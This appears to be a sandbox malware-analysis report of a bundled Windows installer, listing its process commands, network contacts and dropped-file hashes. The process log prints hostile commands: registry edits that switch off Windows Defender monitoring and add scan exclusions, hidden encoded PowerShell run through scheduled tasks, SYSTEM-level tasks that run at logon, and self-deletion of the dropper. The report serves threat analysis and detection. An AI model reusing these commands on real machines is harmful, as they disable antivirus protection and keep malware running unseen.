"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe & exit

C:\Windows\system32\PING.EXE

ping 0

C:\Windows\system32\taskeng.exe

taskeng.exe {AEE7CBD2-A691-464C-9512-8E447F9C410D} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe bt /site_id 757674 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gdoyoZnzk" /SC once /ST 12:07:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gdoyoZnzk"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gdoyoZnzk"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gZmPYbiLE" /SC once /ST 06:42:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gZmPYbiLE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gZmPYbiLE"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\HsdHtTcNAoJBjrVs\FxXpZakA\AbtnDxAOktyFDgsF.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\HsdHtTcNAoJBjrVs\FxXpZakA\AbtnDxAOktyFDgsF.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gCjFpOJnN" /SC once /ST 13:45:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gCjFpOJnN"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gCjFpOJnN"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YESfVrKgbFKcjSeIN" /SC once /ST 08:19:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe\" qz /site_id 757674 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YESfVrKgbFKcjSeIN"

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe qz /site_id 757674 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bGAvhKhnIPTNQeobsw"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XxxUzwYQU\gZNljN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "iwOiVBtjWoVYUMW" /V1 /F

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 mainiwelminobhei.ml udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 setupservice.xyz udp
N/A 188.114.96.0:443 setupservice.xyz tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 95.163.241.63:80 95.163.241.63 tcp
N/A 85.208.136.33:80 85.208.136.33 tcp
N/A 8.8.8.8:53 downwingbuttons.site udp
N/A 8.8.8.8:53 superload.info udp
N/A 91.202.5.58:80 superload.info tcp
N/A 185.117.88.231:80 downwingbuttons.site tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 static-surf.site udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 my-usa.info udp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 91.202.5.58:80 my-usa.info tcp
N/A 8.8.8.8:53 staticcontentfiles.info udp
N/A 8.8.8.8:53 static-surf.site udp
N/A 185.117.88.231:57120 staticcontentfiles.info tcp
N/A 172.67.131.185:80 static-surf.site tcp
N/A 8.8.8.8:53 iplogger.com udp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 148.251.234.93:443 iplogger.com tcp
N/A 8.8.8.8:53 ilonamaska.info udp
N/A 91.202.5.58:80 ilonamaska.info tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 85.208.136.148:80 85.208.136.148 tcp
N/A 104.21.72.223:80 mainiwelminobhei.ml tcp
N/A 8.8.8.8:53 n63b16.info udp
N/A 46.23.109.153:81 n63b16.info tcp
N/A 185.117.88.231:57120 staticcontentfiles.info tcp
N/A 8.8.8.8:53 ip-api.com udp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 8.8.8.8:53 z0dfnakw4qndvgzp3frm4oa5unhcka.lqbriyvuu2wylnkx4 udp

Files

memory/1992-54-0x0000000076411000-0x0000000076413000-memory.dmp

memory/1992-55-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp

MD5 f37fc9007d7cac6c71bfc69921887808
SHA1 ca60cb48048e3bd66919205fadf3be9b54b0ddfd
SHA256 f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53
SHA512 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9

memory/1032-58-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp

MD5 f37fc9007d7cac6c71bfc69921887808
SHA1 ca60cb48048e3bd66919205fadf3be9b54b0ddfd
SHA256 f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53
SHA512 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9

C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp

MD5 f37fc9007d7cac6c71bfc69921887808
SHA1 ca60cb48048e3bd66919205fadf3be9b54b0ddfd
SHA256 f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53
SHA512 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9

\Users\Admin\AppData\Local\Temp\is-G8NKV.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-G8NKV.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-G8NKV.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/1992-65-0x0000000000400000-0x0000000000414000-memory.dmp

\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/728-67-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/1032-70-0x0000000003930000-0x0000000004ABE000-memory.dmp

memory/728-71-0x0000000000400000-0x000000000158E000-memory.dmp

memory/728-72-0x0000000000400000-0x000000000158E000-memory.dmp

memory/728-73-0x0000000000400000-0x000000000158E000-memory.dmp

memory/760-74-0x0000000000000000-mapping.dmp

\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/1476-76-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/1032-79-0x0000000003930000-0x0000000004ABE000-memory.dmp

memory/1476-80-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1476-82-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1032-83-0x0000000003930000-0x0000000004ABE000-memory.dmp

memory/1476-84-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1476-85-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1476-86-0x00000000746F1000-0x00000000746F3000-memory.dmp

C:\Program Files (x86)\Reg Organizer\TurboSearch.exe

MD5 4bf63923ee6f1f20b848371e51f44a7c
SHA1 1c8243554533882b9539c47e9f4a8c72183fe689
SHA256 aa69860c73e0be7add6f4f9945ad3b43e09ed000e8cf1153bd415a880806ddbb
SHA512 92859304a0f91cc9fb2ffdaba0a75f27736d84314d112466d290b6635e6e63d0f6348aaea6c944cdd2bafd16aadf9bfceb5e7496e1688544c8bf4f71cd8259ab

\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe

MD5 879c2312a3f8e7a4f866eb9c68a5c5be
SHA1 763c4907534823d898458ceb1064cfda93b3a242
SHA256 30a2de7b817d8f92c4985cce4880e25dc9681b9479bcecf69f39c5cc4c49fcb0
SHA512 53849bc22f8255158c2238c4cce7acca2b817d9e0fac2894cfc67cfad3e1325fb81267f834a15b3fe5f47ac4923730bf5a8f6c2da7dccf2b0a7a01c3606ca64b

memory/1952-89-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe

MD5 879c2312a3f8e7a4f866eb9c68a5c5be
SHA1 763c4907534823d898458ceb1064cfda93b3a242
SHA256 30a2de7b817d8f92c4985cce4880e25dc9681b9479bcecf69f39c5cc4c49fcb0
SHA512 53849bc22f8255158c2238c4cce7acca2b817d9e0fac2894cfc67cfad3e1325fb81267f834a15b3fe5f47ac4923730bf5a8f6c2da7dccf2b0a7a01c3606ca64b

memory/1924-97-0x0000000000000000-mapping.dmp

memory/1924-100-0x0000000000400000-0x0000000000414000-memory.dmp

memory/692-102-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe

MD5 c6f806e7f38f2f55f6b2e2d31b53564b
SHA1 02c96f6212a5f414199a503bfb3bb9010f2346a5
SHA256 e60c013bf4be1df9fee388bade8d42fd6901182a5edf3d3d08b0f02c5770def7
SHA512 55262f9ac89391710efb217fe76ebb47d3240902f7c4d5f622dd8fba1417f240dfdb0b250beee5316cbe898858d93ef11e5c05e4e0858a94d6d9cdaf008ea28f

C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe

MD5 7731cf5b42c4e5a7bf5859240bbcabd9
SHA1 881ecf093dd8241b664cfc7521a9351dc8d9cf7c
SHA256 a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10
SHA512 cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\System.dll

MD5 cff85c549d536f651d4fb8387f1976f2
SHA1 d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e
